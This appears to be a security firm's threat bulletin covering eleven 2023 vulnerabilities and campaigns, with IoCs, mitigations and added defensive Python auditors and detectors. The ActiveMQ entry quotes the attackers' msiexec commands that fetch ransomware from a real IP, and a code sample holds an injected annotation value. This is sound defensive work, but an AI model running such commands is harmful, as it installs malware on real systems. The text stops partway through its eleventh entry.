BLOG

Threat Bulletin | November 28

In our Threat Bulletins, our Security Operations Center (SOC) team analyzes and summarizes the top threats monitored over the past several weeks. Each entry gives the affected products, the attack vector, the observed impact and the mitigations, so that you can stay one step ahead of the adversaries and harden your defenses against the tactics they are using now.

Threat 1: New Security Flaws Discovered in NGINX Ingress Controller for Kubernetes

Sources: 

 

Entities:  

  • NGINX 
  • Kubernetes 
  • ARMO (Kubernetes security platform) 

 

Indicators of Compromise:  

  • CVE-2022-4886 
  • CVE-2023-5043 
  • CVE-2023-5044 

 

Attack Vectors:  

  • Attackers can exploit vulnerabilities in the NGINX Ingress controller for Kubernetes to steal secret credentials from the cluster. These vulnerabilities allow for path sanitization bypass, arbitrary command execution, and code injection. 

 

Impact:  

  • Successful exploitation of these flaws could result in unauthorized access to sensitive data and the injection of arbitrary code into the ingress controller process. 

 

Detailed Description: 

  • The security flaws in the NGINX Ingress controller for Kubernetes (ingress-nginx) allow attackers to bypass path sanitization, inject arbitrary NGINX configuration, and execute code inside the controller process.  
  • CVE-2022-4886 results from insufficient validation of the path field of the Ingress object, letting an attacker bypass the controller's path sanitization and ultimately reach Kubernetes API credentials.  
  • CVE-2023-5043 and CVE-2023-5044 let an attacker who can create or modify an Ingress object steal secret credentials from the cluster. In the default configuration, these secrets include credentials for the Kubernetes API server with very high privileges. 
  • The attacker uses either the "configuration-snippet" annotation (CVE-2023-5043) or the "permanent-redirect" annotation (CVE-2023-5044) to inject arbitrary code into the ingress controller process and gain access to everything that process has access to. That includes the service account token of the ingress controller, whose ClusterRole allows reading all Kubernetes secrets in the cluster. 

 

Recommendations: 

  • To mitigate the risks associated with these vulnerabilities, apply the mitigations and updates published by the ingress-nginx project: set "strict-validate-path-type" to true in the controller ConfigMap (CVE-2022-4886) and start the controller with the "--enable-annotation-validation" flag.  
  • Updating the NGINX Ingress controller to version 1.19 and adding the "--enable-annotation-validation" command-line flag resolves CVE-2023-5043 and CVE-2023-5044. Where snippet annotations are not needed, also set "allow-snippet-annotations" to false in the ConfigMap so that "configuration-snippet" is rejected outright, and review whether the controller's ClusterRole really needs to read every secret in the cluster. 
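The checks below are an added example (not code from ingress-nginx or ARMO) that audits what the recommendations above describe: Ingress objects carrying the two dangerous annotations, the ConfigMap keys and controller flag that mitigate the flaws, and whether the controller's ClusterRole can read every secret in the cluster. The sample Ingress, ConfigMap, container args and ClusterRole are constructed; the annotation and ConfigMap names are the real ingress-nginx ones, and the "plain URL" rule for permanent-redirect is this example's own heuristic.

```python
"""Audit Ingress objects and ingress-nginx settings for the annotation-injection
exposure (CVE-2023-5043/5044) and the path-type hardening (CVE-2022-4886).
Added example, not ingress-nginx or ARMO code; sample inputs are constructed."""
import re

PREFIX = "nginx.ingress.kubernetes.io/"
# Heuristic: a redirect target that is anything but a plain URL (quotes, semicolons,
# newlines, braces) can escape the nginx directive the controller generates from it.
PLAIN_URL = re.compile(r"^https?://[A-Za-z0-9._~:/?#@!$&'()*+,=%-]+$")


def audit_ingress(ingress: dict) -> list[str]:
    """Findings for one Ingress object as returned by `kubectl get ingress -o json`."""
    meta = ingress["metadata"]
    name = f"{meta.get('namespace', 'default')}/{meta['name']}"
    findings = []
    for key, value in meta.get("annotations", {}).items():
        if not key.startswith(PREFIX):
            continue
        short = key[len(PREFIX):]
        if short in ("configuration-snippet", "server-snippet"):
            findings.append(f"{name}: {short} injects raw nginx config (CVE-2023-5043 vector)")
        elif short == "permanent-redirect" and not PLAIN_URL.match(value):
            findings.append(f"{name}: permanent-redirect is not a plain URL (CVE-2023-5044 vector): {value!r}")
    return findings


def audit_controller(configmap_data: dict, container_args: list[str]) -> list[str]:
    """Check the ingress-nginx ConfigMap data and controller container args for the
    mitigations. Defaults differ between releases, so every setting must be explicit."""
    findings = []
    if configmap_data.get("allow-snippet-annotations", "").lower() != "false":
        findings.append("ConfigMap: allow-snippet-annotations is not explicitly false")
    if configmap_data.get("strict-validate-path-type", "").lower() != "true":
        findings.append("ConfigMap: strict-validate-path-type is not true (CVE-2022-4886 mitigation)")
    if not any(a.split("=")[0] == "--enable-annotation-validation" and a.split("=")[-1] != "false"
               for a in container_args):
        findings.append("controller: --enable-annotation-validation is not set")
    return findings


def secrets_readable_clusterwide(clusterrole: dict) -> bool:
    """True if the ClusterRole grants get/list/watch on secrets, which is what turns
    code execution in the controller pod into every secret in the cluster."""
    for rule in clusterrole.get("rules", []):
        groups, resources, verbs = (rule.get(k, []) for k in ("apiGroups", "resources", "verbs"))
        if ("" in groups or "*" in groups) and ("secrets" in resources or "*" in resources) \
                and any(v in verbs for v in ("get", "list", "watch", "*")):
            return True
    return False


# Constructed sample input: one Ingress with a hostile redirect value (it carries a
# quote and a newline, which a plain URL never has), an unhardened ConfigMap, default
# controller args, and a ClusterRole with cluster-wide secret read.
SAMPLE_INGRESS = {"metadata": {"name": "shop", "namespace": "web", "annotations": {
    "nginx.ingress.kubernetes.io/rewrite-target": "/",
    "nginx.ingress.kubernetes.io/permanent-redirect": 'https://example.com/";\n# injected',
}}}
SAMPLE_CONFIGMAP = {"allow-snippet-annotations": "true"}
SAMPLE_ARGS = ["/nginx-ingress-controller", "--election-id=ingress-nginx-leader"]
SAMPLE_ROLE = {"rules": [{"apiGroups": [""], "resources": ["secrets", "configmaps"],
                          "verbs": ["get", "list", "watch"]}]}

if __name__ == "__main__":
    for line in audit_ingress(SAMPLE_INGRESS) + audit_controller(SAMPLE_CONFIGMAP, SAMPLE_ARGS):
        print("FINDING:", line)
    print("controller role can read all secrets:", secrets_readable_clusterwide(SAMPLE_ROLE))
```

To run it against a live cluster, feed `kubectl get ingress -A -o json` items to audit_ingress, the `data` of the ingress-nginx-controller ConfigMap and the controller container's `args` to audit_controller, and the controller's ClusterRole to secrets_readable_clusterwide.
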
Threat 2: Public Exploit for Critical Cisco IOS XE Vulnerability Released

Sources: 

 

Entities:  

  • Cisco IOS XE 

 

Indicators of Compromise: 

  • CVE-2023-20198 

 

Attack Vectors:

  • Remote code execution through Web Services Management Agent (WSMA) 

 

Impact:

  • Thousands of Cisco IOS XE devices compromised, unauthorized access, reconnaissance 

 

Detailed Description: 

  • CVE-2023-20198 is a critical flaw in the web UI of Cisco IOS XE that allows an unauthenticated remote attacker to create a privilege-15 (full-privilege) user on the device.  
  • The public exploit takes advantage of weaknesses in the Web Services Management Agent (WSMA) and in the NGINX-based server configuration that fronts the web UI; a device is only exposed if the HTTP or HTTPS server feature is enabled and reachable by the attacker.  
  • Cisco has released patches for the most affected release trains, with version 17.3 remaining unpatched at the time of writing.  
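The script below is an added example (not Cisco tooling) for reviewing an exported IOS XE running-config offline for the two things the description above turns on: whether the web UI that was attacked is enabled, and if so whether an access-class limits who can reach it, and whether privilege-15 local users exist that nobody approved, since that is the kind of account the exploit creates. The configuration text is constructed; the approved-user list is an assumption supplied by the caller.

```python
"""Offline review of an IOS XE running-config for CVE-2023-20198 exposure.
Added example, not Cisco tooling; SAMPLE_CONFIG is constructed."""
import re

HTTP_ON = re.compile(r"^\s*ip http (secure-)?server\s*$", re.M)
HTTP_ACL = re.compile(r"^\s*ip http access-class\b", re.M)
LOCAL_USER = re.compile(r"^\s*username (\S+) privilege (\d+)\b", re.M)


def web_ui_findings(config: str) -> list[str]:
    """Report whether `ip http server` / `ip http secure-server` is on, and if so
    whether an `ip http access-class` restricts who can reach the web UI.
    Lines prefixed with `no` never match, so a disabled server yields nothing."""
    enabled = [m.group(0).strip() for m in HTTP_ON.finditer(config)]
    if not enabled:
        return []
    findings = ["web UI enabled: " + ", ".join(enabled)]
    if not HTTP_ACL.search(config):
        findings.append("no ip http access-class restricts who can reach the web UI")
    return findings


def unexpected_priv15_users(config: str, approved: set[str]) -> list[str]:
    """Local users configured with privilege 15 that are not on the approved list."""
    return sorted(user for user, level in LOCAL_USER.findall(config)
                  if int(level) == 15 and user not in approved)


# Constructed running-config excerpt: two privilege-15 users, one of which the
# operator does not recognise, and both HTTP servers on with no access-class.
SAMPLE_CONFIG = """\
hostname edge-rtr-01
username netops privilege 15 secret 9 $9$exampleonly
username svc_unknown privilege 15 secret 9 $9$exampleonly
username helpdesk privilege 1 secret 9 $9$exampleonly
!
ip http server
ip http secure-server
ip http authentication local
!
line vty 0 4
 transport input ssh
"""

if __name__ == "__main__":
    for finding in web_ui_findings(SAMPLE_CONFIG):
        print("FINDING:", finding)
    print("unapproved privilege-15 users:", unexpected_priv15_users(SAMPLE_CONFIG, {"netops"}))
```

An unapproved privilege-15 account on an internet-reachable device should be treated as a compromise to investigate, not just a finding to clean up.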

 

Recommendations:  

  • Apply the fixed IOS XE releases as Cisco publishes them for each release train. 
  • Disable the HTTP server feature ("no ip http server" and "no ip http secure-server") on internet-facing devices, or restrict it with "ip http access-class" so that only trusted management addresses can reach the web UI. 
  • Review the running configuration for unexpected privilege-15 local users and treat any device that has one as compromised until proven otherwise. 

Threat 3: Suspected Exploitation of Apache ActiveMQ - CVE-2023-46604

Sources: 

 

Entities:  

  • Rapid7 
  • Apache ActiveMQ 
  • HelloKitty Ransomware 

 

Attack Vectors:  

  • Remote code execution via Apache ActiveMQ vulnerability 

 

Impact:  

  • Ransomware deployment 
  • Potential data loss 
  • System compromise 

 

Detailed Description: 

  • Rapid7 detected two separate instances of Apache ActiveMQ CVE-2023-46604 exploitation.  
  • The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations. 
  • CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.” 
  • The ransomware encrypts files and communicates with an HTTP server at 172.245.16.125; the ransom demand directs victims to the contact address [email protected]. 
  • During successful exploitation, the java.exe process hosting the targeted ActiveMQ installation (in this case D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64) was observed as the parent of the malicious commands in both incidents.  
  • Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png (MSI packages carrying a .png extension) using MSIExec.  

 

Indicators of Compromise: 

  • http://172[.]245[.]16[.]125/m2.png 
  • http://172[.]245[.]16[.]125/m4.png 
  • Files dropped and executed via the msiexec command: 
    • cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m2.png” 
    • cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png” 
  • The following SHA-256 file hashes belong to the two MSI packages downloaded from 172[.]245[.]16[.]125 and the components they deliver: 
    • M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4 
    • M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0 
    • dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 
    • EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C 

 

Affected Products: 

  • According to Apache’s advisory, CVE-2023-46604 affects the following: 
    • Apache ActiveMQ 5.18.0 before 5.18.3 
    • Apache ActiveMQ 5.17.0 before 5.17.6 
    • Apache ActiveMQ 5.16.0 before 5.16.7 
    • Apache ActiveMQ before 5.15.16 
    • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3 
    • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6 
    • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7 
    • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16 
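The following added example (not Apache's code) turns the affected-version list above into a check a practitioner can run over an inventory: it recovers the version from an install path such as the one seen as the parent process, decides whether that version falls in an affected range, and names the fixed release on the same branch. The sample path is constructed from the one quoted in this bulletin.

```python
"""Classify an ActiveMQ version against the CVE-2023-46604 affected ranges.
Added example, not Apache code; the sample path is constructed."""
import re

# (first affected, first fixed) for each maintained branch; everything older
# than 5.15.16 is affected, per the advisory's "before 5.15.16" entry.
BRANCHES = [((5, 18, 0), (5, 18, 3)), ((5, 17, 0), (5, 17, 6)), ((5, 16, 0), (5, 16, 7))]
OLDEST_FIXED = (5, 15, 16)


def parse_version(text: str) -> tuple[int, ...]:
    """First x.y.z in the text as an int tuple, so versions compare numerically."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(version: str) -> bool:
    v = parse_version(version)
    if v < OLDEST_FIXED:
        return True
    return any(lo <= v < hi for lo, hi in BRANCHES)


def fixed_release_for(version: str):
    """Fixed release on the same branch, or None if the version is not affected."""
    if not is_affected(version):
        return None
    v = parse_version(version)
    for lo, hi in BRANCHES:
        if lo <= v < hi:
            return ".".join(map(str, hi))
    return ".".join(map(str, OLDEST_FIXED))


def version_from_path(path: str) -> str:
    """Recover the version from an install path like
    D:\\Program files\\ActiveMQ\\apache-activemq-5.15.3\\bin\\win64"""
    m = re.search(r"apache-activemq-(\d+\.\d+\.\d+)", path)
    if not m:
        raise ValueError("no apache-activemq-<version> directory in path")
    return m.group(1)


if __name__ == "__main__":
    observed = r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64"  # from this bulletin
    ver = version_from_path(observed)
    print(ver, "affected:", is_affected(ver), "upgrade to:", fixed_release_for(ver))
```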

 

Recommendations: 

  • Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue. 

 

SOC Response: 

  • The SOC is building a detection around the known indicators of compromise at this time and will monitor for any updates around this exploit.
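As an added example of the kind of detection the SOC response above refers to (this is not Rapid7's or the SOC's production rule), the code below runs over process-creation events in a Sysmon-like field layout and flags the chain described in this entry: ActiveMQ's java.exe spawning a shell or msiexec, msiexec installing from a remote URL, and command lines or image hashes that match the published IoCs. The four events are constructed; the IoC address and hashes are the ones listed in this bulletin.

```python
"""Process-creation detection for the ActiveMQ CVE-2023-46604 post-exploitation
chain. Added example, not Rapid7 tooling; SAMPLE_EVENTS are constructed."""
import re

IOC_IPS = {"172.245.16.125"}
IOC_SHA256 = {h.lower() for h in (
    "8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4",  # M2.msi
    "8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0",  # M4.msi
    "C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7",  # dllloader
)}
# msiexec [/switches] /i <http(s) URL>: a package fetched straight from the web.
REMOTE_MSI = re.compile(r"msiexec(?:\.exe)?(?:\s+/\w+)*\s+/i\s+\"?(https?://[^\s\"]+)", re.I)
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe")


def sha256_of(event: dict) -> str:
    """Sysmon's Hashes field is 'SHA1=..,SHA256=..'; return the SHA256 or ''."""
    for part in event.get("Hashes", "").split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return ""


def detect(event: dict) -> list[str]:
    """Every rule the event trips; an empty list means the event is clean."""
    reasons = []
    parent = event.get("ParentImage", "").lower()
    parent_ctx = parent + " " + event.get("ParentCommandLine", "").lower()
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if parent.endswith("java.exe") and "activemq" in parent_ctx and (
            image.endswith(SHELLS) or image.endswith("msiexec.exe")):
        reasons.append("ActiveMQ java.exe spawned " + image.rsplit("\\", 1)[-1])
    m = REMOTE_MSI.search(cmd)
    if m:
        reasons.append("msiexec installing from remote URL " + m.group(1))
    for ip in IOC_IPS:
        if ip in cmd:
            reasons.append("command line references IoC address " + ip)
    if sha256_of(event) in IOC_SHA256:
        reasons.append("image hash matches published IoC")
    return reasons


def scan(events):
    """(event, reasons) for every event that trips at least one rule."""
    return [(e, r) for e in events if (r := detect(e))]


# Constructed events: the observed chain, the msiexec child, a benign event, and
# a hypothetical dropped binary whose hash is one of the published IoCs.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Java\jre1.8.0_202\bin\java.exe",
     "ParentCommandLine": r'"java" -Dactivemq.home=D:\Program files\ActiveMQ\apache-activemq-5.15.3 -jar D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\activemq.jar start',
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c "start msiexec /q /i http://172.245.16.125/m2.png"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec  /q /i http://172.245.16.125/m4.png"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe", "Image": r"C:\Users\Public\dllloader.exe",
     "CommandLine": r"C:\Users\Public\dllloader.exe",
     "Hashes": "SHA256=C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7"},
]

if __name__ == "__main__":
    for event, reasons in scan(SAMPLE_EVENTS):
        print(event["Image"], "->", "; ".join(reasons))
```

The parent-chain rule is the durable one: hashes and the download host change between intrusions, but a message broker's JVM has no business launching cmd.exe or msiexec.
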
Threat 4: Vulnerabilities Found in 34 Windows Drivers Allowing Full Device Takeover

Sources: 

 

Entities:  

  • Windows Driver Model (WDM) drivers 
  • Windows Driver Frameworks (WDF) drivers  

 

Attack Vectors:  

  • Vulnerable Windows drivers 

 

Impact:  

  • Non-privileged threat actors could exploit these drivers to gain control of devices and execute arbitrary code on the underlying systems. This can lead to firmware alteration, privilege escalation, and potentially render systems unbootable. Furthermore, these vulnerabilities can be weaponized for BYOVD (Bring Your Own Vulnerable Driver) attacks. 

 

Detailed Description: 

  • Researchers have identified 34 unique vulnerable Windows drivers built on the Windows Driver Model (WDM) and Windows Driver Frameworks (WDF).  
  • Exploiting these drivers could allow threat actors without administrative privileges to gain control of the device, execute arbitrary code in the kernel, and, in some cases, alter firmware or elevate operating system privileges.  
  • Vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841). Some of the drivers can also be used to bypass security mechanisms such as KASLR. Because they are legitimately signed, they are exactly what BYOVD attacks, as used by the Lazarus Group, rely on: the attacker ships the vulnerable driver with the malware, loads it, and uses it to gain kernel access.  

 

Recommendations:  

  • Keep systems up to date with the latest driver updates and patches, and remove drivers that are no longer needed.  
  • Enable Microsoft's vulnerable driver blocklist (enforced when hypervisor-protected code integrity, HVCI, or Smart App Control is on) so that known-bad signed drivers are refused at load time, and restrict who is allowed to install drivers at all.  
Threat 5: Critical Vulnerabilities Uncovered in Veeam ONE IT Monitoring Software

Sources: 

 

Entities:  

  • Veeam ONE IT monitoring and analytics platform 

 

Attack Vectors:  

  • Vulnerabilities in Veeam ONE IT monitoring and analytics platform 

 

Impact:  

  • Critical vulnerabilities have been identified in Veeam ONE IT monitoring software, with potential risks ranging from remote code execution on SQL servers to obtaining sensitive account information and cross-site scripting attacks. 

 

Detailed Description: 

  • Veeam ONE IT monitoring software has been found to have four vulnerabilities, two of them critical, including flaws that could lead to remote code execution on the SQL server hosting the configuration database, exposure of the NTLM hash of a service account, and cross-site scripting.  
  • The list of vulnerabilities is as follows: 
    • CVE-2023-38547 (CVSS score: 9.9) – An unspecified flaw that can be leveraged by an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database, resulting in remote code execution on the SQL server. 
    • CVE-2023-38548 (CVSS score: 9.8) – A flaw in Veeam ONE that allows an unprivileged user with access to the Veeam ONE Web Client to obtain the NTLM hash of the account used by the Veeam ONE Reporting Service. 
    • CVE-2023-38549 (CVSS score: 4.5) – A cross-site scripting (XSS) vulnerability that allows a user with the Veeam ONE Power User role to obtain the access token of a user with the Veeam ONE Administrator role. 
    • CVE-2023-41723 (CVSS score: 4.3) – A vulnerability in Veeam ONE that permits a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule. 
  • These vulnerabilities can have serious implications for organizations using Veeam ONE for their IT monitoring needs.  
  • To mitigate these risks, Veeam has released security updates for affected versions. 

 

Recommendations:  

  • Users of affected Veeam ONE versions are strongly advised to apply the security updates provided by Veeam. Additionally, it is recommended to stop the Veeam ONE Monitoring and Reporting services, replace existing files with the files provided in the hotfix, and then restart the two services.  
Threat 6: CISA Alerts - Active Exploitation of High-Severity SLP Vulnerability

Sources: 

 

Entities:  

  • Service Location Protocol (SLP) 
  • CVE-2023-29552 

 

Attack Vectors:  

  • Denial-of-Service (DoS) vulnerability in SLP protocol 

 

Impact:  

  • A high-severity flaw in the Service Location Protocol (SLP) is being actively exploited, posing a risk of large denial-of-service (DoS) amplification attacks. Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services on an exposed SLP server and then use spoofed requests to reflect inflated replies at a victim, with an amplification factor of up to roughly 2,200x. 

 

Detailed Description: 

  • CISA has issued an alert and added CVE-2023-29552 to its Known Exploited Vulnerabilities catalog following active exploitation of a high-severity flaw in the Service Location Protocol (SLP).  
  • The vulnerability allows unauthenticated remote attackers to register arbitrary services on an internet-exposed SLP server (UDP/TCP port 427), which inflates the server's replies and lets them launch denial-of-service (DoS) attacks with a considerable amplification factor against a spoofed victim address.  
  • While specific details of the exploitation are unknown, the potential impact on targeted networks and servers is significant. 

 

Recommendations: 

  • Disable the SLP service on systems exposed to untrusted networks, or block UDP and TCP port 427 at the network edge so that the service cannot be reached from the internet.
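An added example (not CISA's or any vendor's code) of how to spot the two conditions described above in flow records: an SLP server answering queries from outside the trusted address ranges, which in a reflection attack means the spoofed victim, and a response-to-request byte ratio high enough to be amplification rather than normal service discovery. The flow records and byte counts are constructed, and the trusted ranges and alert threshold are assumptions to adjust per environment.

```python
"""SLP (port 427) exposure and amplification check over flow records.
Added example, not CISA or vendor code; SAMPLE_FLOWS are constructed."""
import ipaddress
from collections import defaultdict

SLP_PORT = 427
# Assumed internal ranges; anything else reaching an SLP server is untrusted.
TRUSTED = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_trusted(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in TRUSTED)


def summarize_slp(flows):
    """flows: dicts with src, dst, proto, sport, dport, bytes, one record per
    direction. Returns, per SLP server, request bytes in, response bytes out,
    their ratio, and the untrusted client addresses that reached it.
    Only UDP matters here: the amplification vector is UDP reflection."""
    stats = defaultdict(lambda: {"req_bytes": 0, "resp_bytes": 0, "untrusted_clients": set()})
    for f in flows:
        if f["proto"].lower() != "udp":
            continue
        if f["dport"] == SLP_PORT:
            s = stats[f["dst"]]
            s["req_bytes"] += f["bytes"]
            if not is_trusted(f["src"]):
                s["untrusted_clients"].add(f["src"])
        elif f["sport"] == SLP_PORT:
            stats[f["src"]]["resp_bytes"] += f["bytes"]
    for s in stats.values():
        s["ratio"] = s["resp_bytes"] / s["req_bytes"] if s["req_bytes"] else 0.0
    return dict(stats)


def slp_alerts(summary, min_ratio=10.0):
    """Human-readable alerts; min_ratio is an assumed threshold (normal SLP
    discovery answers are only a few times larger than the query)."""
    alerts = []
    for server, s in sorted(summary.items()):
        if s["untrusted_clients"]:
            alerts.append(f"{server}: SLP reachable from untrusted {sorted(s['untrusted_clients'])}")
        if s["ratio"] >= min_ratio:
            alerts.append(f"{server}: SLP response/request ratio {s['ratio']:.0f}x")
    return alerts


# Constructed flows: an internet host hits 10.0.0.5 and gets 200x its bytes back;
# 10.0.0.6 serves a normal internal discovery query.
SAMPLE_FLOWS = [
    {"src": "198.51.100.7", "dst": "10.0.0.5", "proto": "udp", "sport": 40001, "dport": 427, "bytes": 64},
    {"src": "10.0.0.5", "dst": "198.51.100.7", "proto": "udp", "sport": 427, "dport": 40001, "bytes": 12800},
    {"src": "10.0.0.20", "dst": "10.0.0.6", "proto": "udp", "sport": 50123, "dport": 427, "bytes": 70},
    {"src": "10.0.0.6", "dst": "10.0.0.20", "proto": "udp", "sport": 427, "dport": 50123, "bytes": 210},
]

if __name__ == "__main__":
    for line in slp_alerts(summarize_slp(SAMPLE_FLOWS)):
        print("ALERT:", line)
```
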
Threat 7: Hackers Exploit ScreenConnect Remote Access to Breach Healthcare Organizations

Sources: 

 

Entities:  

  • Huntress 
  • ScreenConnect 
  • Transaction Data Systems (TDS) 
  • Healthcare Organizations 

 

Attack Vectors:  

  • Compromised ScreenConnect instances 

 

Impact:  

  • Unauthorized access 
  • Installation of malicious payloads 
  • Network reconnaissance 

 

Detailed Description: 

  • Huntress has identified a series of cyberattacks targeting healthcare organizations in the U.S. that were carried out through ScreenConnect remote access instances used by TDS.  
  • The attackers employ similar tactics across multiple incidents, involving the installation of malicious payloads and additional remote access tools for persistent access.  
  • The compromised endpoints, operating on Windows Server 2019, are associated with the pharmaceutical and healthcare sectors.  
  • The ScreenConnect instance is linked to the ‘rs.tdsclinical[.]com’ domain.  
  • The exact breach mechanism, whether through compromised credentials or another method, remains unclear.  

 

Recommendations:  

  • Immediately investigate and secure ScreenConnect instances associated with the ‘rs[.]tdsclinical[.]com’ domain.
Threat 8: Persistent Backdoor 'Effluence' Persists Despite Applying Patches to Atlassian Confluence Servers

Sources: 

 

Entities:  

  • Atlassian Confluence Servers 
  • Effluence Backdoor 

 

Attack Vectors:  

  • Exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Data Center and Server, leading to the deployment of the Effluence backdoor. The vulnerabilities are:  
    • CVE-2023-22515 – A critical bug that can be abused to create unauthorized Confluence administrator accounts and gain access to Confluence servers. 
    • CVE-2023-22518 – An improper authorization flaw that an attacker can likewise use to set up a rogue administrator account, resulting in a complete loss of confidentiality, integrity, and availability. 

 

Impact:  

  • Deployment of Effluence, a persistent backdoor following the successful exploitation of critical vulnerabilities in Atlassian Confluence Servers.  
    • The backdoor allows remote access without authentication, enabling lateral movement within the network, data exfiltration, and various malicious actions on the compromised server.  

 

Detailed Description: 

  • A persistent backdoor named Effluence was discovered following the exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence servers.  
  • Patching closes the initial entry point but does not remove the backdoor: Effluence stays active on an already compromised server, allowing unauthorized remote access and various malicious activities until it is found and removed.  
  • The adversary gains initial access through CVE-2023-22515 and then embeds a web shell that is reachable from every web page on the server, so the attacker no longer depends on the vulnerability or on a valid account.  

 

Recommendations: 

  • Organizations using Atlassian Confluence servers should urgently apply patches for CVE-2023-22515 and CVE-2023-22518 to mitigate the risk of exploitation, and should hunt for the backdoor (unexpected administrator accounts and installed plugins) on any server that was exposed before it was patched.  

 

SOC Response: 

  • The SOC is building a detection around known indicators of compromise at this time and will continue to monitor for any updates around this exploit. 
Threat 9: Microsoft Addresses 63 Security Bugs, Including 5 Zero-Day Vulnerabilities

Sources: 

 

Entities:  

  • Microsoft 
    • CVE-2023-36025 
    • CVE-2023-36033 
    • CVE-2023-36036 
    • CVE-2023-36038 
    • CVE-2023-36413 

 

Attack Vectors:  

  • Exploitation of zero-day vulnerabilities 
  • Windows SmartScreen 
  • Elevation of Privilege 
  • Denial of Service 
  • Security Feature Bypass 
  • Information Disclosure 

 

Impact:  

  • Elevation of privilege 
  • Bypassing security features 
  • Potential remote code execution 

 

Detailed Description: 

  • Microsoft’s November 2023 updates cover 63 security flaws, including five zero-days: three that were actively exploited (CVE-2023-36025, CVE-2023-36033, CVE-2023-36036) and two that were publicly disclosed before the patch (CVE-2023-36038, CVE-2023-36413). 
  • The five zero-days are as follows – 
    • CVE-2023-36025 (CVSS score: 8.8) – Windows SmartScreen Security Feature Bypass Vulnerability 
    • CVE-2023-36033 (CVSS score: 7.8) – Windows DWM Core Library Elevation of Privilege Vulnerability 
    • CVE-2023-36036 (CVSS score: 7.8) – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability 
    • CVE-2023-36038 (CVSS score: 8.2) – ASP.NET Core Denial of Service Vulnerability 
    • CVE-2023-36413 (CVSS score: 6.5) – Microsoft Office Security Feature Bypass Vulnerability 

 

Recommendations:  

  • Apply Microsoft’s November updates promptly. 
Threat 10: CISA Warning - Juniper Devices Facing Active Exploitation

Sources: 

 

Entities:  

  • CISA 
  • Juniper 

 

Attack Vectors:  

  • Remote Code Execution (RCE) via Juniper’s J-Web interface. 

 

Impact:  

  • Significant risks to federal enterprises; Actively exploited vulnerabilities. 

 

Detailed Description: 

  • The vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in the J-Web interface of Juniper SRX firewalls and EX switches are part of a pre-auth exploit chain allowing remote code execution. 
    • Successful exploitation has been observed in the wild.  
  • Administrators are advised to upgrade Junos OS immediately or to restrict access to the J-Web interface so that it is not reachable from the internet.  
  • CISA emphasizes the urgency by adding the vulnerabilities to its Known Exploited Vulnerabilities catalog. 

 

Recommendations: 

  • Organizations are strongly encouraged to prioritize patching. 
Threat 11: Mirai-based Botnet Exploiting Zero-Day Bugs in Routers and NVRs for Massive DDoS Attacks

Sources: 

  

Entities:  

  • Routers 
  • NVRs 
  • Mirai-based Botnet 
  • Akamai 
  • JenX Mirai 
  • InfectedSlurs 
  • HailBot 
  • wso-ng 
  • AWS 
  • Redis database 
  • Microsoft 

 

Attack Vectors:  

  • Two zero-day vulnerabilities with remote code execution (RCE) functionality targeting routers and network video recorder (NVR) devices. Exploitation of default admin credentials, installation of Mirai variants. 

 

Impact:  

